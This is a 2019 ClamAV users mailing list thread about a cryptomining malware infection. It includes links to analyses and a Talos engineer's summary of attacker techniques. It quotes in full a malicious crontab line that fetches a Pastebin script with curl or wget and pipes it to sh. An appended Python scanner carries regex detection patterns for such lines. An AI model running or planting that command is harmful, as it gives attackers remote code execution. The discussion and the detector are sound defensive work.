[clamav-users] LSD Malwares

Xavier Maysonnave x.maysonnave at gmail.com
Mon Apr 29 05:08:57 UTC 2019


Hi Andrew,
Thanks for your valuable information.
Warmly.
Light

Pudhuveedu / Xavier

PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
<http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>


On Sat, 27 Apr 2019 at 04:06, Andrew Williams <awillia2 at sourcefire.com>
wrote:

> Xavier,
>
> From the information you provided in your initial email, it sounds like
> the malware you encountered is described in-depth here:
>
>
> https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
>
> That blog post provides a lot of insight into what the malware they
> analyzed did, which will hopefully provide you with a way to better
> understand what the malware may have done on your machines.  It's difficult
> to know for sure, though, since the one you encountered may have had
> differences to the one described.  Your best bet to remediate is to just
> restore the server from known-good backups, if possible.
>
> At the end of last year, we published a blog post that tracked three
> groups spreading this type of malware.  From
> https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html,
> the groups tended to follow these TTPs:
> - Used malicious shell scripts masquerading as JPEG files with the name
> "logo*.jpg" that install cron jobs and download and execute miners.
> - Used variants of the open-source miner XMRig intended for botnet mining,
> with versions dependent on the victim's architecture.
> - Scanned for and attempted to exploit recently published vulnerabilities
> in servers such as Apache Struts2, Oracle WebLogic and Drupal.
> - Used malicious scripts and malware hosted on Pastebin sites, Git
> repositories and domains with .tk TLDs.
>
> As you can tell, there's a lot of overlap between all of these, and it's
> not uncommon for one actor to take the scripts and binaries used by another
> and start using them (with slight modifications to use different C2, mine
> to a different wallet, etc.)
>
> Since there's so much overlap between tools and techniques, it's difficult
> to say for sure, but at first glance the infrastructure described in the
> Anomali blog post appears related to that of the malware described by these
> two articles as well:
>
> Nov 2018:
> https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cryptocurrency-mining-malware-targets-linux-systems-uses-rootkit-for-stealth
> Feb 2019:
> https://blog.trendmicro.com/trendlabs-security-intelligence/linux-coin-miner-copied-scripts-from-korkerds-removes-all-other-malware-and-miners/
>
> -Andrew
>
> Andrew Williams
> Malware Research Engineer
> Cisco Talos
>
>
>
> On Thu, Apr 25, 2019 at 11:27 PM Xavier Maysonnave via clamav-users <
> clamav-users at lists.clamav.net> wrote:
>
>> Hi All,
>>
>> Thanks for your feedback.
>> I'm going to report to Cloudflare this URL.
>>
>> However, keep in mind that there are other URLs that are involved in this
>> family.
>> */10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O-
>> https://pastebin.com/raw/wR3ETdbi)|sh
>> This one targets Jenkins, another popular OpenSource tool, not used on
>> our infrastructure though.
>>
>> I'm still very interested in the consequences of this malware. Any
>> hints will be greatly appreciated.
>>
>> Thanks.
>>
>> Light
>>
>> Pudhuveedu / Xavier
>>
>> PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
>> <http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
>>
>>
>> On Fri, 26 Apr 2019 at 08:03, Dave Warren via clamav-users <
>> clamav-users at lists.clamav.net> wrote:
>>
>>> The same applies: Report it. Cloudflare will either forward the
>>> complaint for you, or block the offending URL (or both).
>>>
>>> On 2019-04-25 19:16, Dennis Peterson wrote:
>>> > That domain is hosted on a Cloudflare IP block. They've become part of
>>> > the problem.
>>> >
>>> > dp
>>> >
>>> > On 4/25/19 7:52 AM, J.R. via clamav-users wrote:
>>> >> Perhaps it would also be worthwhile to report dd.heheda.tk to their
>>> >> hosting provider & domain registrar that they are hosting malware and
>>> >> get that site shut down...
>>> >>
>>>
>>> _______________________________________________
>>>
>>> clamav-users mailing list
>>> clamav-users at lists.clamav.net
>>> https://lists.clamav.net/mailman/listinfo/clamav-users
>>>
>>>
>>> Help us build a comprehensive ClamAV guide:
>>> https://github.com/vrtadmin/clamav-faq
>>>
>>> http://www.clamav.net/contact.html#ml
>>>
>>
>
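As an added example (not written by anyone in this thread), here is a small Python scanner over constructed crontab lines that flags the two patterns discussed above: a curl/wget fetch piped straight into sh, typically from Pastebin or a .tk domain, and a "logo*.jpg" file that is really a shell script. The sample entries, hostnames and paste id are constructed placeholders, not indicators from the thread.

```python
import re

# Constructed sample crontab content (placeholder hosts and paste id). Line 2 mirrors
# the "(curl ... || wget ...) | sh" pattern quoted in the thread; line 3 mirrors the
# "logo*.jpg" shell-script-disguised-as-image pattern from the Talos write-up.
SAMPLE_CRON = """\
0 2 * * * /usr/bin/certbot renew --quiet
*/10 * * * * (curl -fsSL https://pastebin.com/raw/XXXXXXXX||wget -q -O- https://pastebin.com/raw/XXXXXXXX)|sh
*/15 * * * * wget -q -O /tmp/logo4.jpg http://example.invalid/logo4.jpg && sh /tmp/logo4.jpg
30 4 * * * /usr/local/bin/backup.sh
"""

FETCH_TOOL = re.compile(r"\b(curl|wget)\b", re.I)          # a downloader is invoked
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba)?sh\b")            # ...and its output is piped to sh
PASTE_OR_TK_HOST = re.compile(r"https?://(?:[\w.-]*pastebin\.com|[\w.-]+\.tk)\b", re.I)
FAKE_IMAGE = re.compile(r"logo[^\s/]*\.jpg", re.I)         # "logo*.jpg" filename
JPG_RUN_BY_SH = re.compile(r"\b(?:ba)?sh\s+\S+\.jpg\b")    # "sh /tmp/logo4.jpg"


def classify_cron_line(line):
    """Return the list of indicator names that one crontab line matches."""
    hits = []
    if FETCH_TOOL.search(line) and PIPE_TO_SHELL.search(line):
        hits.append("fetch-pipe-to-shell")
    if PASTE_OR_TK_HOST.search(line):
        hits.append("paste-or-tk-host")
    if FAKE_IMAGE.search(line):
        hits.append("logo-jpg-filename")
    if JPG_RUN_BY_SH.search(line):
        hits.append("jpg-run-by-sh")
    return hits


def scan_crontab(text):
    """Scan crontab text; return (line number, indicators, line) for suspicious entries."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        hits = classify_cron_line(line)
        if hits:
            findings.append((lineno, hits, line))
    return findings


if __name__ == "__main__":
    for lineno, hits, line in scan_crontab(SAMPLE_CRON):
        print(f"line {lineno}: {', '.join(hits)}\n    {line}")
```

On a real host the same function can be fed the output of `crontab -l` for each user and the contents of /etc/cron.d.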